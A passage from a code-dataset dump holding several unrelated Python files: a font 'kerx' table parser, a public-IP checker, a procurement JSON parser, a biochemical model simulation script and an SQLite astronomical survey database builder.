check_text(s)\n","sub_path":"numOfStrInFile.py","file_name":"numOfStrInFile.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"398135980","text":"#\n# kerx.py\n#\n# Copyright © 2011-2013, 2016 Monotype Imaging Inc. All Rights Reserved.\n#\n\n\"\"\"\nSupport for 'kerx' tables.\n\"\"\"\n\n# System imports\nimport logging\nimport operator\n\n# Other imports\nfrom fontio3.fontdata import seqmeta\n\nfrom fontio3.kerx import (\n coverage,\n format0,\n format1,\n format2,\n format3,\n format4,\n gposconverter)\n\nfrom fontio3.statetables.subtable_glyph_coverage_sets import \\\n SubTableGlyphCoverageSets\n\n# -----------------------------------------------------------------------------\n\n#\n# Private constants\n#\n\n_makers = {\n 0: format0.Format0.fromwalker,\n 1: format1.Format1.fromwalker,\n 2: format2.Format2.fromwalker,\n 3: format3.Format3.fromwalker,\n 4: format4.Format4.fromwalker}\n\n_makers_validated = {\n 0: format0.Format0.fromvalidatedwalker,\n 1: format1.Format1.fromvalidatedwalker,\n 2: format2.Format2.fromvalidatedwalker,\n # 3: format3.Format3.fromvalidatedwalker,\n 4: format4.Format4.fromvalidatedwalker}\n\n# -----------------------------------------------------------------------------\n\n#\n# Classes\n#\n\nclass Kerx(list, metaclass=seqmeta.FontDataMetaclass):\n \"\"\"\n Objects representing entire 'kerx' tables. These are lists of individual\n kerning subtable objects (Format0, Format1, etc.)\n \n >>> _testingValues[1].pprint()\n Subtable #1 (format 0):\n GlyphPair((14, 23)): -25\n GlyphPair((14, 96)): -30\n GlyphPair((18, 38)): 12\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \n >>> _testingValues[1].pprint(namer=namer.testingNamer())\n Subtable #1 (format 0):\n (xyz15, afii60001): -30\n (xyz15, xyz24): -25\n (xyz19, xyz39): 12\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \n >>> _testingValues[2].pprint()\n Subtable #1 (format 2):\n ClassPair((1, 1)): -25\n ClassPair((1, 2)): -10\n ClassPair((2, 1)): 15\n Left-hand classes:\n 15: 1\n 25: 1\n 35: 2\n Right-hand classes:\n 9: 1\n 12: 1\n 15: 1\n 40: 2\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \"\"\"\n \n #\n # Class definition variables\n #\n \n seqSpec = dict(\n item_followsprotocol = True,\n item_pprintlabelfunc = (\n lambda i, obj: \"Subtable #%d (format %d)\" % (i + 1, obj.format)),\n item_pprintlabelfuncneedsobj = True,\n seq_compactremovesfalses = True)\n\n attrSpec = dict(\n preferredVersion = dict(\n attr_ignoreforcomparisons = True,\n attr_initfunc = (lambda: None),\n attr_showonlyiftrue = True,\n attr_pprintfunc = (lambda p,x,label,**k: p.simple(hex(x), label=label)),\n attr_wisdom = (\"Preferred version when writing. Initially \"\n \"set to the same as originalVersion; override by setting \"\n \"a format number or set to None to allow fontio3 to \"\n \"analyze and write what it thinks is best for the content.\")),\n\n originalVersion = dict(\n attr_ignoreforcomparisons = True,\n attr_initfunc = (lambda: None),\n attr_showonlyiftrue = True,\n attr_pprintfunc = (lambda p,x,label,**k: p.simple(hex(x), label=label)),\n attr_wisdom = \"Original version when read\"))\n\n attrSorted = ('preferredVersion', 'originalVersion')\n\n #\n # Methods\n #\n \n def buildBinary(self, w, **kwArgs):\n \"\"\"\n Adds the binary data for the Kerx object to the specified LinkedWriter.\n The keyword arguments are:\n \n addSentinel Set to True to cause (where appropriate) subtables\n to have the (0xFFFF, 0xFFFF, 0) sentinel added at\n the end (note this does not affect the subtable's\n count of numPairs or whatever).\n \n stakeValue The stake value to be used at the start of this\n output.\n\n >>> h = utilities.hexdump\n >>> obj = _testingValues[1]\n >>> h(obj.binaryString())\n 0 | 0002 0000 0000 0001 0000 002E 0000 0000 |................|\n 10 | 0000 0000 0000 0003 0000 000C 0000 0001 |................|\n 20 | 0000 0006 000E 0017 FFE7 000E 0060 FFE2 |.............`..|\n 30 | 0012 0026 000C |...&.. |\n >>> h(obj.binaryString(addSentinel=True))\n 0 | 0002 0000 0000 0001 0000 0034 0000 0000 |...........4....|\n 10 | 0000 0000 0000 0003 0000 000C 0000 0001 |................|\n 20 | 0000 0006 000E 0017 FFE7 000E 0060 FFE2 |.............`..|\n 30 | 0012 0026 000C FFFF FFFF 0000 |...&........ |\n \"\"\"\n \n if 'stakeValue' in kwArgs:\n stakeValue = kwArgs.pop('stakeValue')\n w.stakeCurrentWithValue(stakeValue)\n else:\n stakeValue = w.stakeCurrent()\n \n version = 0x00020000 # default to version 2\n if self.preferredVersion:\n # check if caller prefers a specific version\n if self.preferredVersion in {0x00020000, 0x00030000}:\n version = self.preferredVersion\n else:\n raise ValueError(\"Unknown preferredVersion (0x%08X), expected 0x00020000 or 0x00030000\" % (self.preferredVersion,))\n else:\n # use version 3 if there are any non-empty coverage sets\n for subtable in self:\n if subtable.glyphCoverageSet:\n version = 0x00030000\n break\n w.add(\"2L\", version, len(self))\n\n for subtable in self:\n startLength = w.byteLength\n lengthStake = w.addDeferredValue(\"L\")\n subtable.coverage.buildBinary(w)\n w.add(\"BL\", subtable.format, (subtable.tupleIndex or 0))\n subtable.buildBinary(w, **kwArgs)\n \n w.setDeferredValue(\n lengthStake,\n \"L\",\n int(w.byteLength - startLength))\n\n if version == 0x00030000:\n glyphCoverageSets = SubTableGlyphCoverageSets(\n [subtable.glyphCoverageSet for subtable in self])\n glyphCoverageSets.buildBinary(w, isKerx=True, **kwArgs)\n\n @classmethod\n def fromGPOS(cls, gposObj, scriptTag, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified GPOS object\n for the specified script. The Lookup order will be preserved as the\n subtable order in the new Kerx object.\n \n The following keyword arguments are supported:\n \n backMap If a dict is passed in as this keyword argument, it\n will be filled with a mapping from GPOS feature tag to\n sets of Kerx indices.\n \n langSys A 4-byte bytestring representing the langSys to be\n converted in the specified script. If this value is not\n specified, the defaultLangSys will be used; if the\n specified script does not have any features in the\n defaultLangSys then an empty Kerx object will be\n returned.\n \n ### gposObj = _makeGPOS()\n ### gposObj.pprint()\n Features:\n Feature 'kern0001':\n Lookup 0:\n Subtable 0 (Pair (glyph) positioning table):\n Key((15, 32)):\n Second adjustment:\n FUnit adjustment to origin's x-coordinate: -18\n Key((20, 30)):\n Second adjustment:\n FUnit adjustment to origin's x-coordinate: 14\n Lookup flags:\n Right-to-left for Cursive: False\n Ignore base glyphs: False\n Ignore ligatures: False\n Ignore marks: False\n Sequence order (lower happens first): 0\n Scripts:\n Script object latn:\n Default LangSys object:\n Optional feature tags:\n kern0001\n \n ### e = utilities.fakeEditor(0x100)\n ### k = Kerx.fromGPOS(gposObj, b'latn', editor=e)\n ### k.pprint()\n Subtable #1 (format 0):\n GlyphPair((15, 32)): -18\n GlyphPair((20, 30)): 14\n Header information:\n Horizontal\n With-stream\n No variation kerning\n Process forward\n \"\"\"\n \n r = cls()\n \n if scriptTag not in gposObj.scripts:\n return r\n \n lsdObj = gposObj.scripts[scriptTag]\n ls = kwArgs.pop('langSys', None)\n \n if ls is None:\n lsObj = lsdObj.defaultLangSys\n elif ls in lsdObj:\n lsObj = lsdObj[ls]\n else:\n return r\n \n if lsObj.requiredFeature:\n allFeats = {lsObj.requiredFeature}\n else:\n allFeats = set(lsObj.optionalFeatures)\n \n # At this point we have all the needed feature tags. Now we need to\n # retrieve the Feature objects so we can ascertain the ordering.\n \n featDict = gposObj.features\n orderDict = {}\n \n for featTag in allFeats:\n featObj = featDict[featTag]\n \n for lkupIndex, lkupObj in enumerate(featObj):\n orderDict[(featTag, lkupIndex)] = lkupObj.sequence\n \n # Now we're ready to start converting, and additionally filling in the\n # backmap (or a throwaway local version, if one wasn't specified).\n \n it = sorted(orderDict.items(), key=operator.itemgetter(1))\n backMap = kwArgs.pop('backMap', {})\n \n for (featTag, lkupIndex), sequence in it:\n lkupObj = featDict[featTag][lkupIndex]\n \n for subObj in lkupObj:\n gTuples, eTuples = subObj.effects(**kwArgs)\n v = gposconverter.analyze(gTuples, eTuples, **kwArgs)\n \n rg = range(len(r), len(r) + len(v))\n backMap.setdefault(featTag, set()).update(rg)\n r.extend(v)\n \n return r\n \n @classmethod\n def fromkern(cls, k, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified Kern object.\n \"\"\"\n \n def _it():\n for oldTable in k:\n if oldTable.format == 0:\n yield format0.Format0.fromkern_format0(oldTable)\n elif oldTable.format == 1:\n yield format1.Format1.fromkern_format1(oldTable)\n else:\n raise ValueError(\"Unknown old 'kern' subtable format!\")\n \n return cls(_it())\n \n @classmethod\n def fromvalidatedwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified walker, doing\n source validation.\n \n >>> s = _testingValues[1].binaryString()\n >>> logger = utilities.makeDoctestLogger(\"fvw\")\n >>> fvb = Kerx.fromvalidatedbytes\n >>> obj = fvb(s, logger=logger)\n fvw.kerx - DEBUG - Walker has 54 remaining bytes.\n fvw.kerx.subtable 0.format0 - DEBUG - Walker has 34 remaining bytes.\n >>> obj == _testingValues[1]\n True\n \n >>> fvb(s[:1], logger=logger)\n fvw.kerx - DEBUG - Walker has 1 remaining bytes.\n fvw.kerx - ERROR - Insufficient bytes.\n \"\"\"\n \n logger = kwArgs.pop('logger', logging.getLogger())\n logger = logger.getChild(\"kerx\")\n \n logger.debug((\n 'V0001',\n (w.length(),),\n \"Walker has %d remaining bytes.\"))\n \n if w.length() < 8:\n logger.error(('V0004', (), \"Insufficient bytes.\"))\n return None\n \n version, numTables = w.unpack(\"2L\")\n\n if version not in {0x20000, 0x30000}:\n logger.error((\n 'V0002',\n (version,),\n \"Expected version 0x00020000 or 0x00030000 but got 0x%08X.\"))\n \n return None\n \n r = cls(\n [None] * numTables,\n originalVersion=version,\n preferredVersion=version)\n\n kwArgs.pop('tupleIndex', None)\n kwArgs.pop('coverage', None)\n\n newTables = []\n for i in range(numTables):\n itemLogger = logger.getChild(\"subtable %d\" % (i,))\n \n if w.length() < 4:\n itemLogger.error(('V0004', (), \"Insufficient bytes.\"))\n return None\n \n byteLength = w.unpack(\"L\") - 12 # i.e. what's left after the header\n cov = coverage.Coverage.fromvalidatedwalker(w, logger=itemLogger)\n \n if cov is None:\n return None\n \n if w.length() < 5:\n itemLogger.error((\n 'V0790',\n (),\n \"The coverage and tupleIndex are missing or incomplete.\"))\n \n return None\n \n format, tupleIndex = w.unpack(\"BL\")\n \n if format not in _makers_validated:\n itemLogger.error((\n 'V0791',\n (format,),\n \"Subtable format %d is not valid.\"))\n \n return None\n \n wSub = w.subWalker(0, relative=True, newLimit=byteLength)\n \n thisSubtable = _makers_validated[format](\n wSub,\n coverage = cov,\n tupleIndex = tupleIndex,\n logger = itemLogger,\n **kwArgs)\n \n if thisSubtable is None:\n return None\n \n newTables.append(thisSubtable)\n w.skip(byteLength)\n\n if version == 0x30000:\n subtableGlyphCoverageSets = SubTableGlyphCoverageSets.fromwalker(\n w, numTables, **kwArgs)\n for i, thisSubtable in enumerate(newTables):\n thisSubtable.glyphCoverageSet = subtableGlyphCoverageSets[i]\n\n for i, thisSubtable in enumerate(newTables):\n r[i] = thisSubtable\n\n return r\n \n @classmethod\n def fromwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a Kerx object from the specified walker.\n \n >>> obj = _testingValues[1]\n >>> obj == Kerx.frombytes(obj.binaryString())\n True\n \"\"\"\n \n version, numTables = w.unpack(\"2L\")\n \n if version not in {0x20000, 0x30000}:\n raise ValueError(\"Unknown 'kerx' version: 0x%08X!\" % (version,))\n \n r = cls(\n [None] * numTables,\n originalVersion=version,\n preferredVersion=version)\n kwArgs.pop('tupleIndex', None)\n kwArgs.pop('coverage', None)\n\n newTables = []\n for i in range(numTables):\n byteLength = w.unpack(\"L\") - 12 # i.e. what's left after header\n cov = coverage.Coverage.fromwalker(w)\n format, tupleIndex = w.unpack(\"BL\")\n \n if format not in _makers:\n \n raise ValueError(\n \"Unknown 'kerx' subtable format: %d\" % (format,))\n \n wSub = w.subWalker(0, relative=True, newLimit=byteLength)\n \n thisSubtable = _makers[format](\n wSub,\n coverage = cov,\n tupleIndex = tupleIndex,\n **kwArgs)\n\n newTables.append(thisSubtable)\n w.skip(byteLength)\n\n if version == 0x30000:\n subtableGlyphCoverageSets = SubTableGlyphCoverageSets.fromwalker(\n w, numTables, **kwArgs)\n for i, thisSubtable in enumerate(newTables):\n thisSubtable.glyphCoverageSet = subtableGlyphCoverageSets[i]\n\n for i, thisSubtable in enumerate(newTables):\n r[i] = thisSubtable\n\n return r\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n def __________________(): pass\n\nif __debug__:\n from fontio3 import utilities\n from fontio3.utilities import namer\n \n def _makeGPOS():\n from fontio3.GPOS import (\n GPOS,\n pairglyphs,\n pairglyphs_key,\n pairvalues,\n value)\n \n from fontio3.opentype import (\n featuredict,\n featuretable,\n langsys,\n langsys_optfeatset,\n langsysdict,\n lookup,\n scriptdict)\n \n # Return a GPOS with (15, 32) kerned -18, and (20, 30) kerned +14\n v1 = value.Value(xPlacement=-18)\n v2 = value.Value(xPlacement=14)\n pv1 = pairvalues.PairValues(second=v1)\n pv2 = pairvalues.PairValues(second=v2)\n k1 = pairglyphs_key.Key((15, 32))\n k2 = pairglyphs_key.Key((20, 30))\n pairObj = pairglyphs.PairGlyphs({k1: pv1, k2: pv2})\n lkObj = lookup.Lookup([pairObj])\n ftObj = featuretable.FeatureTable([lkObj])\n featObj = featuredict.FeatureDict({b'kern0001': ftObj})\n \n optSetObj = langsys_optfeatset.OptFeatSet({b'kern0001'})\n lsObj = langsys.LangSys(optionalFeatures=optSetObj)\n lsdObj = langsysdict.LangSysDict({}, defaultLangSys=lsObj)\n scptObj = scriptdict.ScriptDict({b'latn': lsdObj})\n return GPOS.GPOS(features=featObj, scripts=scptObj)\n \n _f0tv = format0._testingValues\n _f2tv = format2._testingValues\n \n _testingValues = (\n Kerx([]),\n Kerx([_f0tv[1]]),\n Kerx([_f2tv[1]]))\n \n del _f0tv\n\ndef _test():\n import doctest\n doctest.testmod()\n\nif __name__ == \"__main__\":\n if __debug__:\n _test()\n","sub_path":"fontio3/build/lib.linux-x86_64-3.6/fontio3/kerx/kerx.py","file_name":"kerx.py","file_ext":"py","file_size_in_byte":18017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"153657303","text":"from __future__ import print_function\n\n__title__ = 'pif.checkers.tnx.nl.pif_ip_checker'\n__author__ = 'Bruno Santeramo'\n__copyright__ = 'Copyright (c) 2016 Bruno Santeramo'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = ('TnxIPChecker',)\n\nfrom requests import get\n\nfrom pif.base import BasePublicIPChecker, registry\n\nclass TnxIPChecker(BasePublicIPChecker):\n \"\"\"\n Checks IPs using tnx.nl.\n \"\"\"\n uid = 'tnx.nl'\n\n def get_public_ip(self):\n \"\"\"\n Gets public IP.\n\n :return str:\n \"\"\"\n try:\n data = get('http://tnx.nl/ip').text.rstrip()\n return data\n except Exception as e:\n if self.verbose:\n print(e)\n\n\nregistry.register(TnxIPChecker)\n","sub_path":"Domain/Python/site-packages/pif/checkers/tnx/pif_ip_checker.py","file_name":"pif_ip_checker.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"445696518","text":"import json, os\n\n\nclass parser_json_bec:\n \"\"\"Classe para parseamento de json's\"\"\"\n\n def __init__(self):\n pass\n\n def parse_bec_basico(self, file_path, multiple=False):\n resultados = []\n if multiple:\n arquivos = []\n for f in os.listdir(file_path):\n arquivos.append(file_path + \"/\" + f)\n else:\n arquivos = [file_path]\n for a in arquivos:\n json_dct = json.load(open(a, \"r\"))[0]\n # # PREGÕES\n # if 'DESC_ATA_GERADAPR' in json_dct and json_dct['DESC_ATA_GERADAPR']:\n # \tnumero_oc = json_dct['OC']\n # \tuf = json_dct['UF']\n # \tmodalidade = json_dct['MODALIDADE']\n # \tente_federativo = json_dct['DESC_ATA_GERADAPR']['OCCompleta']['EnteFederativo']\n # \tresponsaveis = str(json_dct['DESC_ATA_GERADAPR']['OCCompleta']['Responsaveis'])\n # \tequipe_apoio = str(json_dct['DESC_ATA_GERADAPR']['OCCompleta']['EquipeApoio'])\n # \tdata_ini = json_dct['DT_INICIO']\n # \tdata_fim = json_dct['DT_FIM']\n # \tresultados.append((numero_oc, uf, modalidade, ente_federativo, responsaveis, equipe_apoio, data_ini, data_fim))\n if (\n \"DESC_ATA_GERADACV_ENCERRAMENTO\" in json_dct\n and json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"]\n ):\n numero_oc = json_dct[\"OC\"]\n uf = json_dct[\"UF\"]\n modalidade = json_dct[\"MODALIDADE\"]\n ente_federativo = (\n json_dct[\"UNIDADE_COMPRADORA\"]\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n try:\n responsaveis = (\n str(json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"][\"RESPONSAVEL\"])\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n except:\n responsaveis = (\n str(json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"][\"RESPONSAVEIS\"])\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n equipe_apoio = \"\"\n data_ini = json_dct[\"DT_INICIO\"]\n data_fim = json_dct[\"DT_FIM\"]\n resultados.append(\n (\n numero_oc,\n uf,\n modalidade,\n ente_federativo,\n responsaveis,\n equipe_apoio,\n data_ini,\n data_fim,\n )\n )\n return resultados\n\n\ndef main():\n p = parser_json()\n p.parse_bec_basico(\"/home/danilo/Downloads/BEC_json\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"common_nlp/parser_json_bec.py","file_name":"parser_json_bec.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"438535116","text":"# Runs ANRM 1.0 (Irvin et. al 2013) under a range of pro-apoptotic and pro-necrotic caspase 8\n# concentrations.\n\nimport numpy as np\nimport pylab as p\nimport matplotlib as mpl\nimport pickle\nfrom anrm.numtools import calibratortools as ct\nfrom anrm.numtools import simulator_1_0 as sim\n\n# ----------Model and Initial Conditions----------------\nfrom anrm.irvin_anrm_model import model\n\nrange_Bid = [0, 4000, 8000, 12044, 16000, 20000]\n\n#-----------Calibrated Parameters-----------------------\nposition = pickle.load(open('irvin_anrm_model_fitted_params.pkl'))\n\n#-----------Simulator Settings--------------------------\nsims = sim.Settings()\nsims.model = model\nsims.tspan = np.linspace(0,28800,3000) #8hrs converted to seconds (3000 timepoints)\nsims.estimate_params = model.parameters_rules()\nsims.rtol = 1e-5\nsims.atol = 1e-5\n\nsolve = sim.Solver(sims)\nsolve.run()\n\ndelta_td = []\napopt_td = []\nnecro_td = []\n\np.ion()\nyout = []\n\ncondition_variable = 'Bid_0'\ngraph_name = 'Bid'\nobservable = 'RIP1_FADD'\ngraph_obs = 'RIP1-FADD binding'\nrangecv = range_Bid\n\nfor i in rangecv:\n #-----------Initial Conditions--------------------------\n ic_params = model.parameters_initial_conditions()\n conditions = ct.initial_conditions([condition_variable, 'TNFa_0', 'Bax_0', 'Bak_0'], [i, 1500, 0, 0], ic_params)\n ysim = solve.simulate(position = position, observables=True, initial_conc = conditions)\n \n #-----------Plot Parp and MLKL--------------------------\n yout.append(ct.extract_records(ysim, [observable]))\n\nfor j in range(len(rangecv)):\n p.plot(sims.tspan/3600.0, yout[j], label = '%s %s per cell' % (rangecv[j], graph_name), linewidth = 3)\n\np.title('%s in WT cells with 25ng/mL TNF and varying initial %s concentrations' % (graph_obs, graph_name))\np.xlabel('time [hrs]')\np.ylabel('%s [molecules per cell]' % graph_obs)\np.legend(bbox_to_anchor = [0.9, -0.25])\n\n","sub_path":"Figures/Fig5C_RIPFADD_vs_Bid_in_DKO.py","file_name":"Fig5C_RIPFADD_vs_Bid_in_DKO.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"171287639","text":"#for making a file list\nimport glob\nimport numpy as np\nfrom astropy.table import Table\nimport sqlite3 as lite\nimport pandas as pd\n#for checking if something is nan\nimport math\n\n#name of the database\ndb_name = \"survey_database.db\"\n\ndef makeFileList(mypath, extension):\n\t\"\"\"\n\tMakes list of files with certain file extension\n\t\n\tInput: mypath (str), extension (str): for example .fits\n\t\n\tReturns: str array (location of files)\n\t\"\"\"\n\tobjectfiles = glob.glob(mypath + '*' + extension)\n\tobjectfiles = np.sort(objectfiles)\n\t\n\treturn objectfiles\n\ndef createDB():\n\t\"\"\"\n\tCreate the database with the required columns\n\t\"\"\"\n\t\n\t#the keys of the three tables of the database\n\t#note that ID = identifier for every image (= catalogue)\n\tposdata_keys = np.array(['StarID','FieldID','Ra','Dec','X','Y'])\n\tfieldinfo_keys = np.array(['ID','FieldID', 'Filename', 'MJD','Airmass','Exptime','Filter'])\n\tfluxdata_keys = np.array(['StarID','ID','Flux1','dFlux1','Flux2', 'dFlux2','Flux3','dFlux3','Mag1','dMag1','Mag2','dMag2','Mag3','dMag3','Class'])\n\t#the names of the tables\n\ttablenames = np.array(['PosData','FieldInfo','FluxData'])\n\t\n\t#check if the database exists\n\tif len(glob.glob(db_name)) > 0:\n\t\treturn {tablenames[0]:posdata_keys, tablenames[1]:fieldinfo_keys, tablenames[2]:fluxdata_keys}, tablenames\n\t\t\n\tprint('Creating new database with name \"{0}\"...'.format(db_name))\n\t\t\n\tcon = lite.connect(db_name)\n\tcur = con.cursor()\n\n\t#create the table for the positional data\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(StarID INT, \n\tFieldID INT,\n\tRa FLOAT, \n\tDec FLOAT, \n\tX FLOAT, \n\tY FLOAT)\"\"\".format(tablenames[0])\n\tcur.execute(createtable) #run command\n\t\n\t\n\t#create the table for the field info like date and exposure time\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(ID INT,\n\tFieldID INT, \n\tFilename varchar(255),\n\tMJD DOUBLE,\n\tAirmass FLOAT,\n\tExptime INT,\n\tFilter varchar(5))\"\"\".format(tablenames[1])\n\tcur.execute(createtable) #run command\n\t\n\t#create the table for the fluxes and the magnitudes\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(StarID INT,\n\tID INT, \n\tFlux1 FLOAT,\n\tdFlux1 FLOAT,\n\tFlux2 FLOAT,\n\tdFlux2 FLOAT,\n\tFlux3 FLOAT,\n\tdFlux3 FLOAT,\n\tMag1 FLOAT,\n\tdMag1 FLOAT,\n\tMag2 FLOAT,\n\tdMag2 FLOAT,\n\tMag3 FLOAT,\n\tdMag3 FLOAT,\n\tClass INT\n\t)\"\"\".format(tablenames[2])\n\tcur.execute(createtable) #run command\n\t\n\tcon.close()\n\t\n\treturn {tablenames[0]:posdata_keys, tablenames[1]:fieldinfo_keys, tablenames[2]:fluxdata_keys}, tablenames\n\t\ndef fillTable(dbn, data, keys, tablename):\n\t\"\"\"\n\tFill a table in a database\n\t\"\"\"\n\t\n\t#open the database\n\tcon = lite.connect(dbn)\n\twith con:\n\t\tcur = con.cursor()\n\n\t\t#determine the number of keys\n\t\tnkeys = len(keys)\n\n\t\t#fill the table\n\t\tfor i in np.arange(len(data[keys[0]])):\n\t\t\tinsertcommand = \"INSERT INTO {0} VALUES(\".format(tablename)\n\t\t\t\n\t\t\t#add all the values from the data array row\n\t\t\tfor key, j in zip(keys, np.arange(nkeys)):\n\t\t\t\t#check if there is a nan in the row. If so, we have to adjust the \n\t\t\t\t#insert command\n\t\t\t\tif type(data[key][i]) != np.str_ and math.isnan(data[key][i]):\n\t\t\t\t\tinsertcommand += \"NULL\"\n\t\t\t\t#check if we have to add quotations around the data\n\t\t\t\telif type(data[key][i]) == np.str_:\n\t\t\t\t\tinsertcommand += \"'\" + data[key][i] + \"'\"\n\t\t\t\telse:\n\t\t\t\t\tinsertcommand += str(data[key][i])\n\t\t\t\t\n\t\t\t\t#add commas to seperate the different values\n\t\t\t\tif j < (nkeys - 1):\n\t\t\t\t\tinsertcommand += \",\"\n\t\t\t\t\n\t\t\t#close the command with a bracket\n\t\t\tinsertcommand += \")\"\n\t\t\t\n\t\t\tcur.execute(insertcommand)\n\t\t\t\ndef fillDataBase(dataloc = 'Tables/'):\n\t\"\"\"\n\tFill the database with data from fits tables in the folder 'Tables/'\n\t\"\"\"\n\t\t\n\tallkeys, tablenames = createDB()\n\n\t#load the csv\n\tcsv_data = Table.read('Tables/file_info_for_problem.csv')\n\t#fill the 'FieldInfo' table with the data from the csv\n\tfillTable(db_name, csv_data, allkeys['FieldInfo'], 'FieldInfo')\n\n\t#make a list of the filenames of the fits files\n\tfilelist = makeFileList(dataloc, '.fits')\n\tflistlength = len(filelist)\n\t#loop over all the found filenames\n\tfor fname, i in zip(filelist, np.arange(flistlength)):\n\t\tprint('Loading file {0}/{1}...'.format(i+1, flistlength))\n\n\t\ttabledata = Table.read(fname)\n\n\t\t#find the field ID\n\t\tfID = int(fname[len(dataloc):].split('-')[1])\n\n\t\t#find the filter\n\t\tfilt = fname[len(dataloc):].split('-')[2].split('.')[0]\n\n\t\t#find the image ID using the fieldID and filter\n\t\tiID = csv_data['ID'][(csv_data['Filter'] == filt) * (csv_data['FieldID'] == fID)][0]\n\n\t\t#add the image ID to the table\n\t\ttabledata['ID'] = np.tile([iID], len(tabledata[allkeys['PosData'][0]]))\n\t\t#add Field ID to the table\n\t\ttabledata['FieldID'] = np.tile([fID], len(tabledata[allkeys['PosData'][0]]))\n\n\t\t#insert the data in the PosData and FluxData tables\n\t\tfillTable(db_name, tabledata, allkeys['PosData'], 'PosData')\n\t\tfillTable(db_name, tabledata, allkeys['FluxData'], 'FluxData')\n\ndef makeKDE(data, names, query_id):\n\t\"\"\"\n\tMake a KDE plot of the different columns in the SQL data\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\n\tsns.set(font = 'Latin Modern Roman',rc = {'legend.frameon': True})\n\n\t#the bandwidth to be used\n\tbandwidth = 0.2\n\n\t#rename the columns of the dataframe\n\tdata.columns = names\n\t#remove all none or nan values\n\tdata = data.dropna()\n\n\t# plt.hist(np.array(data_dict['J'])[0])\n\tfor n in names:\n\t\tsns.kdeplot(np.array(data[n]), bw = bandwidth, label = n)\n\n\tplt.legend(loc = 'best', title = 'Filter', shadow = True)\n\tplt.title('KDE plot of database filters with bandwidth = {0}'.format(bandwidth))\n\tplt.xlabel('Magnitude')\n\tplt.ylabel('Probability')\n\tplt.savefig('{0}_visualization.pdf'.format(query_id), dpi = 300)\n\tplt.show()\n\ndef makeHistogram(data, names, query_id):\n\t\"\"\"\n\tMake a histogram of the given SQL output rows\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\n\tsns.set(font = 'Latin Modern Roman',rc = {'legend.frameon': True})\n\n\t#rename the columns of the dataframe\n\tdata.columns = names\n\t#remove all none or nan values\n\tdata = data.dropna()\n\n\tsns.distplot(data[names[1]], kde = False, color = 'g')\n\t# plt.hist(data[names[1]])\n\n\t# plt.legend(loc = 'best', title = 'Filter', shadow = True)\n\tif query_id == 'R2':\n\t\tplt.title('Histogram of J - H')\n\t\tplt.xlim((1.4, 2.25))\n\t# plt.yscale('log')\n\t\tplt.xlabel('J - H')\n\t\tplt.ylabel('Number of stars')\n\telif query_id == 'R3':\n\t\tplt.xlim((-6000, 250000))\n\t\tplt.title('Histogram of Ks flux')\n\t\tplt.xlabel('Flux')\n\t\tplt.ylabel('Number of stars')\n\tplt.savefig('{0}_visualization.pdf'.format(query_id), dpi = 300)\n\tplt.show()\n\ndef saveResults(data, query_id):\n\t\"\"\"\n\tSave the results of a query to a csv file.\n\n\tInput:\n\t\tdata (pandas dataframe): a dataframe containing the data to be saved.\\n\n\t\tquery_id (str): the name of the query.\n\t\"\"\"\n\tdata.to_csv('./Query_results/{0}_results.csv'.format(query_id), index = False)\n\ndef R1():\n\t\"\"\"\n\tTest query R1\n\t\"\"\"\n\tprint('\\nQuery 1:')\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\t\t\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT i.ID, COUNT(f.StarID)\n\t\t\t\tFROM FluxData f JOIN FieldInfo i \n\t\t\t\tON f.ID = i.ID\n\t\t\t\tWHERE f.Flux1/f.dFlux1 > 5 AND f.Class = -1\n\t\t\t\tGROUP BY i.ID HAVING MJD BETWEEN 56800 AND 57300\n\t\t\t\t\"\"\"\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tprint(data)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R1')\n\ndef R2():\n\t\"\"\"\n\tTest query R2\n\t\"\"\"\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT j.StarID, j.Mag1 - h.Mag1\n\t\t\t\tFROM (SELECT f.Mag1, f.StarID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J') j\n\t\t\t\tJOIN (SELECT f.Mag1, f.StarID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = 